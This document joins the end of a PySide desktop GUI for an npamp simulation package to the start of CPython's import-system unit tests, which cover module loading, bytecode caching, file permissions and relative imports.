self.actionNew.triggered.connect(self.onNew)
self.actionOpen.triggered.connect(self.onOpen)
self.actionSave.triggered.connect(self.onSave)
self.actionSaveAs.triggered.connect(self.onSaveAs)
self.actionClose.triggered.connect(self.onCloseFile)
self.actionExecute.triggered.connect(self.onExecute)
self.actionQuit.triggered.connect(self.onQuit)
self.actionAbout.triggered.connect(self.onAbout)
def checkSave(self):
if self.gui2conf() != self.working_conf:
choice = QtGui.QMessageBox.question(self, "Changes Made", "Do you want to save changes to %s?" % self.shortFilename(), QtGui.QMessageBox.Save|QtGui.QMessageBox.Discard|QtGui.QMessageBox.Cancel)
if choice is QtGui.QMessageBox.Save:
return True
elif choice is QtGui.QMessageBox.Discard:
return False
else:
return None
else:
return False
def confirmProceed(self):
save = self.checkSave()
if save is True:
self.save()
return True
elif save is False:
return True
else:
return False
def openFile(self, path):
conf = file2conf(path)
old_conf = self.gui2conf()
try:
self.conf2gui(conf)
except:
self.conf2gui(old_conf)
raise
self.working_conf = conf
self.working_path = path
self.output_path = None
self.updateUI()
def saveAs(self):
default = self.working_path or os.path.join(self.default_directory, self.untitled_name)
path, _ = QtGui.QFileDialog.getSaveFileName(self, "Save As", default, self.file_filters)
if not path:
return False
conf = self.gui2conf()
conf2file(conf, path)
self.working_conf = conf
self.working_path = path
self.output_path = None
self.updateUI()
return True
def save(self):
if self.working_path is not None:
conf = self.gui2conf()
conf2file(conf, self.working_path)
self.working_conf = conf
return True
else:
return self.saveAs()
def onNew(self):
if self.confirmProceed():
self.conf2gui(defaults)
self.working_conf = npamp.cfg.copy_conf(defaults)
self.working_path = None
self.output_path = None
self.updateUI()
def onOpen(self):
if self.confirmProceed():
default = os.path.dirname(self.working_path) if self.working_path else self.default_directory
path, _ = QtGui.QFileDialog.getOpenFileName(self, "Open", default, self.file_filters)
if not path:
return
self.openFile(path)
def onSave(self):
self.save()
def onSaveAs(self):
self.saveAs()
def onCloseFile(self):
if self.working_path is not None:
if self.confirmProceed():
self.working_conf = self.gui2conf()
self.working_path = None
self.output_path = None
self.updateUI()
def onExecute(self):
conf = self.gui2conf()
if conf["graphs"]:
if self.output_path is not None:
output_path = self.output_path
else:
default = os.path.dirname(self.working_path) if self.working_path else self.default_directory
output_path = QtGui.QFileDialog.getExistingDirectory(self, "Output Directory", default)
if not output_path:
return
if os.listdir(output_path):
choice = QtGui.QMessageBox.warning(self, "Directory Not Empty", "The selected directory is not empty.\nDo you want to continue?", QtGui.QMessageBox.Yes|QtGui.QMessageBox.No)
if choice is not QtGui.QMessageBox.Yes:
return
self.output_path = output_path
else:
output_path = None
in_conn, out_conn = multiprocessing.Pipe(False)
proc = multiprocessing.Process(name=meta.app_name, target=worker, args=(self.monitor_pipe, out_conn, conf, output_path, debug_mode))
thr = InputThread(in_conn)
out = OutputWindow(self, proc, thr)
thr.received.connect(out.onOutputRead)
thr.finished.connect(out.onWorkerFinished)
proc.start()
out_conn.close()
thr.start()
out.exec_()
def onQuit(self):
self.close()
def onAbout(self):
text = "%s %s\n\n%s\n%s\n\n%s\n\n%s\n%s\n\n%s" % (meta.app_name, meta.app_version, meta.app_copyright, meta.app_rights, meta.app_description, meta.app_author_msg, meta.app_coauthors_msg, meta.app_website_msg)
text += "\n\n"
if not self.extensions:
text += "No extensions installed."
else:
text += "Installed extensions (name: description):"
for extension in self.extensions:
name, doc = extension.__name__, extension.__doc__
text += "\n%s: %s" % (name, doc)
QtGui.QMessageBox.about(self, "About %s" % meta.app_name, text)
def closeEvent(self, event):
if self.confirmProceed():
event.accept()
else:
event.ignore()
class OutputWindow(QtGui.QDialog, outwin.Ui_Dialog):
def __init__(self, parent, proc, thr):
QtGui.QDialog.__init__(self, parent)
self.proc = proc
self.thr = thr
self.setupUi(self)
self.buttonBox.buttons()[0].setDefault(True)
self.connectSignals()
self.setWindowTitle(meta.app_name + " output")
width = max(self.sizeHint().width(), self.width())
height = max(self.sizeHint().height(), self.height())
self.resize(width, height)
self.setCursor(QtCore.Qt.BusyCursor)
def connectSignals(self):
self.buttonBox.clicked.connect(self.onButtonClicked)
def onButtonClicked(self, button):
buttons = self.buttonBox.buttons()
if button is buttons[0]:
self.stopWorker()
elif button is buttons[1]:
self.close()
else:
assert False, "unhandled button"
def reject(self):
self.close()
def stopWorker(self):
self.proc.terminate()
self.proc.join()
self.thr.wait()
self.buttonBox.buttons()[0].setEnabled(False)
def onOutputRead(self, s):
self.plainTextEdit.appendPlainText(s)
self.plainTextEdit.ensureCursorVisible()
def onWorkerFinished(self):
self.stopWorker()
self.unsetCursor()
def closeEvent(self, event):
self.stopWorker()
event.accept()
class InputThread(QtCore.QThread):
received = QtCore.Signal(str)
finished = QtCore.Signal()
def __init__(self, in_conn):
super(InputThread, self).__init__()
self.in_conn = in_conn
def run(self):
while True:
try:
s = self.in_conn.recv()
except EOFError:
break
self.received.emit(s)
self.in_conn.close()
self.finished.emit()
def worker((monitor_in, monitor_out), out_conn, conf, output_path, debug_mode):
mpout = npamp.mp.MPOutput(out_conn.send)
sys.stdout = sys.stderr = mpout
monitor_out.close()
thr = threading.Thread(target=npamp.mp.monitor_thread, args=(monitor_in,))
thr.daemon = True
thr.start()
npamp.debug_mode = debug_mode
npamp.params.__dict__.update(conf)
npamp.run(None, output_path, None)
def main():
multiprocessing.freeze_support()
signal.signal(signal.SIGINT, signal.SIG_DFL)
app = QtGui.QApplication(sys.argv)
global old_excepthook
old_excepthook = sys.excepthook
sys.excepthook = boot_excepthook
init_app_dir()
opts, args = getopt.getopt(sys.argv[1:], "g")
for opt, _ in opts:
if opt == "-g":
global debug_mode
debug_mode = True
npamp.debug_mode = True
else:
assert False, "unhandled option"
if len(args) > 1:
raise npamp.InvocationError("too many arguments")
extensions = npamp.load_extensions()
win = AppWindow(extensions)
if args:
win.openFile(args[0])
win.show()
sys.excepthook = old_excepthook
win.add_excepthook()
sys.exit(app.exec_())
if __name__ == "__main__":
main()
|
__init__.py
|
# We import importlib *ASAP* in order to test #15386
import importlib
import importlib.util
from importlib._bootstrap_external import _get_sourcefile
import builtins
import marshal
import os
import platform
import py_compile
import random
import shutil
import subprocess
import stat
import sys
import threading
import time
import unittest
import unittest.mock as mock
import textwrap
import errno
import contextlib
import glob
import test.support
from test.support import (
EnvironmentVarGuard, TESTFN, check_warnings, forget, is_jython,
make_legacy_pyc, rmtree, run_unittest, swap_attr, swap_item, temp_umask,
unlink, unload, create_empty_file, cpython_only, TESTFN_UNENCODABLE,
temp_dir, DirsOnSysPath)
from test.support import script_helper
from test.test_importlib.util import uncache
skip_if_dont_write_bytecode = unittest.skipIf(
sys.dont_write_bytecode,
"test meaningful only when writing bytecode")
def remove_files(name):
for f in (name + ".py",
name + ".pyc",
name + ".pyw",
name + "$py.class"):
unlink(f)
rmtree('__pycache__')
@contextlib.contextmanager
def _ready_to_import(name=None, source=""):
# sets up a temporary directory and removes it
# creates the module file
# temporarily clears the module from sys.modules (if any)
# reverts or removes the module when cleaning up
name = name or "spam"
with temp_dir() as tempdir:
path = script_helper.make_script(tempdir, name, source)
old_module = sys.modules.pop(name, None)
try:
sys.path.insert(0, tempdir)
yield name, path
sys.path.remove(tempdir)
finally:
if old_module is not None:
sys.modules[name] = old_module
elif name in sys.modules:
del sys.modules[name]
class ImportTests(unittest.TestCase):
def setUp(self):
remove_files(TESTFN)
importlib.invalidate_caches()
def tearDown(self):
unload(TESTFN)
def test_import_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
import something_that_should_not_exist_anywhere
def test_from_import_missing_module_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
from something_that_should_not_exist_anywhere import blah
def test_from_import_missing_attr_raises_ImportError(self):
with self.assertRaises(ImportError):
from importlib import something_that_should_not_exist_anywhere
def test_from_import_missing_attr_has_name_and_path(self):
with self.assertRaises(ImportError) as cm:
from os import i_dont_exist
self.assertEqual(cm.exception.name, 'os')
self.assertEqual(cm.exception.path, os.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from 'os' \(.*os.py\)")
@cpython_only
def test_from_import_missing_attr_has_name_and_so_path(self):
import _testcapi
with self.assertRaises(ImportError) as cm:
from _testcapi import i_dont_exist
self.assertEqual(cm.exception.name, '_testcapi')
self.assertEqual(cm.exception.path, _testcapi.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from '_testcapi' \(.*\.(so|pyd)\)")
def test_from_import_missing_attr_has_name(self):
with self.assertRaises(ImportError) as cm:
# _warning has no path as it's a built-in module.
from _warning import i_dont_exist
self.assertEqual(cm.exception.name, '_warning')
self.assertIsNone(cm.exception.path)
def test_from_import_missing_attr_path_is_canonical(self):
with self.assertRaises(ImportError) as cm:
from os.path import i_dont_exist
self.assertIn(cm.exception.name, {'posixpath', 'ntpath'})
self.assertIsNotNone(cm.exception)
def test_from_import_star_invalid_type(self):
import re
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("__all__ = [b'invalid_type']")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__all__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("globals()[b'invalid_type'] = object()")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__dict__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
def test_case_sensitivity(self):
# Brief digression to test that import is case-sensitive: if we got
# this far, we know for sure that "random" exists.
with self.assertRaises(ImportError):
import RAnDoM
def test_double_const(self):
# Another brief digression to test the accuracy of manifest float
# constants.
from test import double_const # don't blink -- that *was* the test
def test_import(self):
def test_with_extension(ext):
# The extension is normally ".py", perhaps ".pyw".
source = TESTFN + ext
if is_jython:
pyc = TESTFN + "$py.class"
else:
pyc = TESTFN + ".pyc"
with open(source, "w") as f:
print("# This tests Python's ability to import a",
ext, "file.", file=f)
a = random.randrange(1000)
b = random.randrange(1000)
print("a =", a, file=f)
print("b =", b, file=f)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
importlib.invalidate_caches()
try:
try:
mod = __import__(TESTFN)
except ImportError as err:
self.fail("import from %s failed: %s" % (ext, err))
self.assertEqual(mod.a, a,
"module loaded (%s) but contents invalid" % mod)
self.assertEqual(mod.b, b,
"module loaded (%s) but contents invalid" % mod)
finally:
forget(TESTFN)
unlink(source)
unlink(pyc)
sys.path.insert(0, os.curdir)
try:
test_with_extension(".py")
if sys.platform.startswith("win"):
for ext in [".PY", ".Py", ".pY", ".pyw", ".PYW", ".pYw"]:
test_with_extension(ext)
finally:
del sys.path[0]
def test_module_with_large_stack(self, module='longlist'):
# Regression test for http://bugs.python.org/issue561858.
filename = module + '.py'
# Create a file with a list of 65000 elements.
with open(filename, 'w') as f:
f.write('d = [\n')
for i in range(65000):
f.write('"",\n')
f.write(']')
try:
# Compile & remove .py file; we only need .pyc.
# Bytecode must be relocated from the PEP 3147 bytecode-only location.
py_compile.compile(filename)
finally:
unlink(filename)
# Need to be able to load from current dir.
sys.path.append('')
importlib.invalidate_caches()
namespace = {}
try:
make_legacy_pyc(filename)
# This used to crash.
exec('import ' + module, None, namespace)
finally:
# Cleanup.
del sys.path[-1]
unlink(filename + 'c')
unlink(filename + 'o')
# Remove references to the module (unload the module)
namespace.clear()
try:
del sys.modules[module]
except KeyError:
pass
def test_failing_import_sticks(self):
source = TESTFN + ".py"
with open(source, "w") as f:
print("a = 1/0", file=f)
# New in 2.4, we shouldn't be able to import that no matter how often
# we try.
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
if TESTFN in sys.modules:
del sys.modules[TESTFN]
try:
for i in [1, 2, 3]:
self.assertRaises(ZeroDivisionError, __import__, TESTFN)
self.assertNotIn(TESTFN, sys.modules,
"damaged module in sys.modules on %i try" % i)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_import_name_binding(self):
# import x.y.z binds x in the current namespace
import test as x
import test.support
self.assertIs(x, test, x.__name__)
self.assertTrue(hasattr(test.support, "__file__"))
# import x.y.z as w binds z as w
import test.support as y
self.assertIs(y, test.support, y.__name__)
def test_issue31286(self):
# import in a 'finally' block resulted in SystemError
try:
x = ...
finally:
import test.support.script_helper as x
# import in a 'while' loop resulted in stack overflow
i = 0
while i < 10:
import test.support.script_helper as x
i += 1
# import in a 'for' loop resulted in segmentation fault
for i in range(2):
import test.support.script_helper as x
def test_failing_reload(self):
# A failing reload should leave the module object in sys.modules.
source = TESTFN + os.extsep + "py"
with open(source, "w") as f:
f.write("a = 1\nb=2\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertIn(TESTFN, sys.modules)
self.assertEqual(mod.a, 1, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
# On WinXP, just replacing the .py file wasn't enough to
# convince reload() to reparse it. Maybe the timestamp didn't
# move enough. We force it to get reparsed by removing the
# compiled file too.
remove_files(TESTFN)
# Now damage the module.
with open(source, "w") as f:
f.write("a = 10\nb=20//0\n")
self.assertRaises(ZeroDivisionError, importlib.reload, mod)
# But we still expect the module to be in sys.modules.
mod = sys.modules.get(TESTFN)
self.assertIsNotNone(mod, "expected module to be in sys.modules")
# We should have replaced a w/ 10, but the old b value should
# stick.
self.assertEqual(mod.a, 10, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
finally:
del sys.path[0]
remove_files(TESTFN)
unload(TESTFN)
@skip_if_dont_write_bytecode
def test_file_to_source(self):
# check if __file__ points to the source file where available
source = TESTFN + ".py"
with open(source, "w") as f:
f.write("test = None\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertTrue(mod.__file__.endswith('.py'))
os.remove(source)
del sys.modules[TESTFN]
make_legacy_pyc(source)
importlib.invalidate_caches()
mod = __import__(TESTFN)
base, ext = os.path.splitext(mod.__file__)
self.assertEqual(ext, '.pyc')
finally:
del sys.path[0]
remove_files(TESTFN)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
def test_import_by_filename(self):
path = os.path.abspath(TESTFN)
encoding = sys.getfilesystemencoding()
try:
path.encode(encoding)
except UnicodeEncodeError:
self.skipTest('path is not encodable to {}'.format(encoding))
with self.assertRaises(ImportError) as c:
__import__(path)
def test_import_in_del_does_not_crash(self):
# Issue 4236
testfn = script_helper.make_script('', TESTFN, textwrap.dedent("""\
import sys
class C:
def __del__(self):
import importlib
sys.argv.insert(0, C())
"""))
script_helper.assert_python_ok(testfn)
@skip_if_dont_write_bytecode
def test_timestamp_overflow(self):
# A modification timestamp larger than 2**32 should not be a problem
# when importing a module (issue #11235).
sys.path.insert(0, os.curdir)
try:
source = TESTFN + ".py"
compiled = importlib.util.cache_from_source(source)
with open(source, 'w') as f:
pass
try:
os.utime(source, (2 ** 33 - 5, 2 ** 33 - 5))
except OverflowError:
self.skipTest("cannot set modification time to large integer")
except OSError as e:
if e.errno not in (getattr(errno, 'EOVERFLOW', None),
getattr(errno, 'EINVAL', None)):
raise
self.skipTest("cannot set modification time to large integer ({})".format(e))
__import__(TESTFN)
# The pyc file was created.
os.stat(compiled)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_bogus_fromlist(self):
try:
__import__('http', fromlist=['blah'])
except ImportError:
self.fail("fromlist must allow bogus names")
@cpython_only
def test_delete_builtins_import(self):
args = ["-c", "del __builtins__.__import__; import os"]
popen = script_helper.spawn_python(*args)
stdout, stderr = popen.communicate()
self.assertIn(b"ImportError", stdout)
def test_from_import_message_for_nonexistent_module(self):
with self.assertRaisesRegex(ImportError, "^No module named 'bogus'"):
from bogus import foo
def test_from_import_message_for_existing_module(self):
with self.assertRaisesRegex(ImportError, "^cannot import name 'bogus'"):
from re import bogus
def test_from_import_AttributeError(self):
# Issue #24492: trying to import an attribute that raises an
# AttributeError should lead to an ImportError.
class AlwaysAttributeError:
def __getattr__(self, _):
raise AttributeError
module_name = 'test_from_import_AttributeError'
self.addCleanup(unload, module_name)
sys.modules[module_name] = AlwaysAttributeError()
with self.assertRaises(ImportError) as cm:
from test_from_import_AttributeError import does_not_exist
self.assertEqual(str(cm.exception),
"cannot import name 'does_not_exist' from '<unknown module name>' (unknown location)")
@cpython_only
def test_issue31492(self):
# There shouldn't be an assertion failure in case of failing to import
# from a module with a bad __name__ attribute, or in case of failing
# to access an attribute of such a module.
with swap_attr(os, '__name__', None):
with self.assertRaises(ImportError):
from os import does_not_exist
with self.assertRaises(AttributeError):
os.does_not_exist
def test_concurrency(self):
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'data'))
try:
exc = None
def run():
event.wait()
try:
import package
except BaseException as e:
nonlocal exc
exc = e
for i in range(10):
event = threading.Event()
threads = [threading.Thread(target=run) for x in range(2)]
try:
with test.support.start_threads(threads, event.set):
time.sleep(0)
finally:
sys.modules.pop('package', None)
sys.modules.pop('package.submodule', None)
if exc is not None:
raise exc
finally:
del sys.path[0]
@unittest.skipUnless(sys.platform == "win32", "Windows-specific")
def test_dll_dependency_import(self):
from _winapi import GetModuleFileName
dllname = GetModuleFileName(sys.dllhandle)
pydname = importlib.util.find_spec("_sqlite3").origin
depname = os.path.join(
os.path.dirname(pydname),
"sqlite3{}.dll".format("_d" if "_d" in pydname else ""))
with test.support.temp_dir() as tmp:
tmp2 = os.path.join(tmp, "DLLs")
os.mkdir(tmp2)
pyexe = os.path.join(tmp, os.path.basename(sys.executable))
shutil.copy(sys.executable, pyexe)
shutil.copy(dllname, tmp)
for f in glob.glob(os.path.join(sys.prefix, "vcruntime*.dll")):
shutil.copy(f, tmp)
shutil.copy(pydname, tmp2)
env = None
env = {k.upper(): os.environ[k] for k in os.environ}
env["PYTHONPATH"] = tmp2 + ";" + os.path.dirname(os.__file__)
# Test 1: import with added DLL directory
subprocess.check_call([
pyexe, "-Sc", ";".join([
"import os",
"p = os.add_dll_directory({!r})".format(
os.path.dirname(depname)),
"import _sqlite3",
"p.close"
])],
stderr=subprocess.STDOUT,
env=env,
cwd=os.path.dirname(pyexe))
# Test 2: import with DLL adjacent to PYD
shutil.copy(depname, tmp2)
subprocess.check_call([pyexe, "-Sc", "import _sqlite3"],
stderr=subprocess.STDOUT,
env=env,
cwd=os.path.dirname(pyexe))
@skip_if_dont_write_bytecode
class FilePermissionTests(unittest.TestCase):
# tests for file mode on cached .pyc files
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_creation_mode(self):
mask = 0o022
with temp_umask(mask), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
module = __import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
# Check that the umask is respected, and the executable bits
# aren't set.
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)),
oct(0o666 & ~mask))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_mode_issue_2051(self):
# permissions of .pyc should match those of .py, regardless of mask
mode = 0o600
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(mode))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_readonly(self):
mode = 0o400
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
expected = mode | 0o200 # Account for fix for issue #6074
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(expected))
def test_pyc_always_writable(self):
# Initially read-only .pyc files on Windows used to cause problems
# with later updates, see issue #6074 for details
with _ready_to_import() as (name, path):
# Write a Python file, make it read-only and import it
with open(path, 'w') as f:
f.write("x = 'original'\n")
# Tweak the mtime of the source to ensure pyc gets updated later
s = os.stat(path)
os.utime(path, (s.st_atime, s.st_mtime-100000000))
os.chmod(path, 0o400)
m = __import__(name)
self.assertEqual(m.x, 'original')
# Change the file and then reimport it
os.chmod(path, 0o600)
with open(path, 'w') as f:
f.write("x = 'rewritten'\n")
unload(name)
importlib.invalidate_caches()
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
# Now delete the source file and check the pyc was rewritten
unlink(path)
unload(name)
importlib.invalidate_caches()
bytecode_only = path + "c"
os.rename(importlib.util.cache_from_source(path), bytecode_only)
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
class PycRewritingTests(unittest.TestCase):
# Test that the `co_filename` attribute on code objects always points
# to the right file, even when various things happen (e.g. both the .py
# and the .pyc file are renamed).
module_name = "unlikely_module_name"
module_source = """
import sys
code_filename = sys._getframe().f_code.co_filename
module_filename = __file__
constant = 1
def func():
pass
func_filename = func.__code__.co_filename
"""
dir_name = os.path.abspath(TESTFN)
file_name = os.path.join(dir_name, module_name) + os.extsep + "py"
compiled_name = importlib.util.cache_from_source(file_name)
def setUp(self):
self.sys_path = sys.path[:]
self.orig_module = sys.modules.pop(self.module_name, None)
os.mkdir(self.dir_name)
with open(self.file_name, "w") as f:
f.write(self.module_source)
sys.path.insert(0, self.dir_name)
importlib.invalidate_caches()
def tearDown(self):
sys.path[:] = self.sys_path
if self.orig_module is not None:
sys.modules[self.module_name] = self.orig_module
else:
unload(self.module_name)
unlink(self.file_name)
unlink(self.compiled_name)
rmtree(self.dir_name)
def import_module(self):
ns = globals()
__import__(self.module_name, ns, ns)
return sys.modules[self.module_name]
def test_basics(self):
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
del sys.modules[self.module_name]
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_incorrect_code_name(self):
py_compile.compile(self.file_name, dfile="another_module.py")
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_module_without_source(self):
target = "another_module.py"
py_compile.compile(self.file_name, dfile=target)
os.remove(self.file_name)
pyc_file = make_legacy_pyc(self.file_name)
importlib.invalidate_caches()
mod = self.import_module()
self.assertEqual(mod.module_filename, pyc_file)
self.assertEqual(mod.code_filename, target)
self.assertEqual(mod.func_filename, target)
def test_foreign_code(self):
py_compile.compile(self.file_name)
with open(self.compiled_name, "rb") as f:
header = f.read(16)
code = marshal.load(f)
constants = list(code.co_consts)
foreign_code = importlib.import_module.__code__
pos = constants.index(1)
constants[pos] = foreign_code
code = type(code)(code.co_argcount, code.co_posonlyargcount,
code.co_kwonlyargcount,
code.co_nlocals, code.co_stacksize,
code.co_flags, code.co_code, tuple(constants),
code.co_names, code.co_varnames, code.co_filename,
code.co_name, code.co_firstlineno, code.co_lnotab,
code.co_freevars, code.co_cellvars)
with open(self.compiled_name, "wb") as f:
f.write(header)
marshal.dump(code, f)
mod = self.import_module()
self.assertEqual(mod.constant.co_filename, foreign_code.co_filename)
class PathsTests(unittest.TestCase):
SAMPLES = ('test', 'test\u00e4\u00f6\u00fc\u00df', 'test\u00e9\u00e8',
'test\u00b0\u00b3\u00b2')
path = TESTFN
def setUp(self):
os.mkdir(self.path)
self.syspath = sys.path[:]
def tearDown(self):
rmtree(self.path)
sys.path[:] = self.syspath
# Regression test for http://bugs.python.org/issue1293.
def test_trailing_slash(self):
with open(os.path.join(self.path, 'test_trailing_slash.py'), 'w') as f:
f.write("testdata = 'test_trailing_slash'")
sys.path.append(self.path+'/')
mod = __import__("test_trailing_slash")
self.assertEqual(mod.testdata, 'test_trailing_slash')
unload("test_trailing_slash")
# Regression test for http://bugs.python.org/issue3677.
@unittest.skipUnless(sys.platform == 'win32', 'Windows-specific')
def test_UNC_path(self):
with open(os.path.join(self.path, 'test_unc_path.py'), 'w') as f:
f.write("testdata = 'test_unc_path'")
importlib.invalidate_caches()
# Create the UNC path, like \\myhost\c$\foo\bar.
path = os.path.abspath(self.path)
import socket
hn = socket.gethostname()
drive = path[0]
unc = "\\\\%s\\%s$"%(hn, drive)
unc += path[2:]
try:
os.listdir(unc)
except OSError as e:
if e.errno in (errno.EPERM, errno.EACCES, errno.ENOENT):
# See issue #15338
self.skipTest("cannot access administrative share %r" % (unc,))
raise
sys.path.insert(0, unc)
try:
mod = __import__("test_unc_path")
except ImportError as e:
self.fail("could not import 'test_unc_path' from %r: %r"
% (unc, e))
self.assertEqual(mod.testdata, 'test_unc_path')
self.assertTrue(mod.__file__.startswith(unc), mod.__file__)
unload("test_unc_path")
class RelativeImportTests(unittest.TestCase):
def tearDown(self):
unload("test.relimport")
setUp = tearDown
def test_relimport_star(self):
# This will import * from .test_import.
from .. import relimport
self.assertTrue(hasattr(relimport, "RelativeImportTests"))
def test_issue3221(self):
# Note for mergers: the 'absolute' tests from the 2.x branch
# are missing in Py3k because implicit relative imports are
# a thing of the past
#
# Regression test for http://bugs.python.org/issue3221.
def check_relative():
exec("from . import relimport", ns)
# Check relative import OK with __package__ and __name__ correct
ns = dict(__package__='test', __name__='test.notarealmodule')
check_relative()
# Check relative import OK with only __name__ wrong
ns = dict(__package__='test', __name__='notarealpkg.notarealmodule')
check_relative()
# Check relative import fails with only __package__ wrong
ns = dict(__package__='foo', __name__='test.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with __package__ and __name__ wrong
ns = dict(__package__='foo', __name__='notarealpkg.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with package set to a non-string
ns = dict(__package__=object())
self.assertRaises(TypeError, check_relative)
def test_absolute_import_without_future(self):
# If explicit relative import syntax is used, then do not try
# to perform an absolute import in the face of failure.
# Issue #7902.
with self.assertRaises(ImportError):
from .os import sep
self.fail("explicit relative import triggered an "
"implicit absolute import")
def test_import_from_non_package(self):
path = os.path.join(os.path.dirname(__file__), 'data', 'package2')
with uncache('submodule1', 'submodule2'), DirsOnSysPath(path):
with self.assertRaises(ImportError):
import submodule1
self.assertNotIn('submodule1', sys.modules)
self.assertNotIn('submodule2', sys.modules)
def test_import_from_unloaded_package(self):
with uncache('package2', 'package2.submodule1', 'package2.submodule2'), \
DirsOnSysPath(os.path.join(os.path.dirname(__file__), 'data')):
import package2.submodule1
package2.submodule1.submodule2
class OverridingImportBuiltinTests(unittest.TestCase):
def test_override_builtin(self):
# Test that overriding builtins.__import__ can bypass sys.modules.
import os
def foo():
import os
return os
self.assertEqual(foo(), os) # Quick sanity check.
with swap_attr(builtins, "__import__", lambda *x: 5):
self.assertEqual(foo(), 5)
# Test what happens when we shadow __import__ in globals(); this
# currently does not impact the import process, but if this changes,
# other code will need to change, so keep this test as a tripwire.
with swap_item(globals(), "__import__", lambda *x: 5):
self.assertEqual(foo(), os)
class PycacheTests(unittest.TestCase):
# Test the various PEP 3147/488-related behaviors.
def _clean(self):
forget(TESTFN)
rmtree('__pycache__')
unlink(self.source)
def setUp(self):
self.source = TESTFN + '.py'
self._clean()
with open(self.source, 'w') as fp:
print('# This is a test file written by test_import.py', file=fp)
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
def tearDown(self):
assert sys.path[0] == os.curdir, 'Unexpected sys.path[0]'
del sys.path[0]
self._clean()
@skip_if_dont_write_bytecode
def test_import_pyc_path(self):
self.assertFalse(os.path.exists('__pycache__'))
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} does not '
'exist'.format(pyc_path, TESTFN))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
@unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
"due to varying filesystem permission semantics (issue #11956)")
@skip_if_dont_write_bytecode
def test_unwritable_directory(self):
# When the umask causes the new __pycache__ directory to be
# unwritable, the import still succeeds but no .pyc file is written.
with temp_umask(0o222):
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertFalse(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} '
'exists'.format(pyc_path, TESTFN))
@skip_if_dont_write_bytecode
def test_missing_source(self):
# With PEP 3147 cache layout, removing the source but leaving the pyc
# file does not satisfy the import.
__import__(TESTFN)
pyc_file = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_file))
os.remove(self.source)
forget(TESTFN)
importlib.invalidate_caches()
self.assertRaises(ImportError, __import__, TESTFN)
@skip_if_dont_write_bytecode
def test_missing_source_legacy(self):
# Like test_missing_source() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __file__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
try:
self.assertEqual(m.__file__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
finally:
os.remove(pyc_file)
def test___cached__(self):
# Modules now also have an __cached__ that points to the pyc file.
m = __import__(TESTFN)
pyc_file = importlib.util.cache_from_source(TESTFN + '.py')
self.assertEqual(m.__cached__, os.path.join(os.curdir, pyc_file))
@skip_if_dont_write_bytecode
def test___cached___legacy_pyc(self):
# Like test___cached__() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
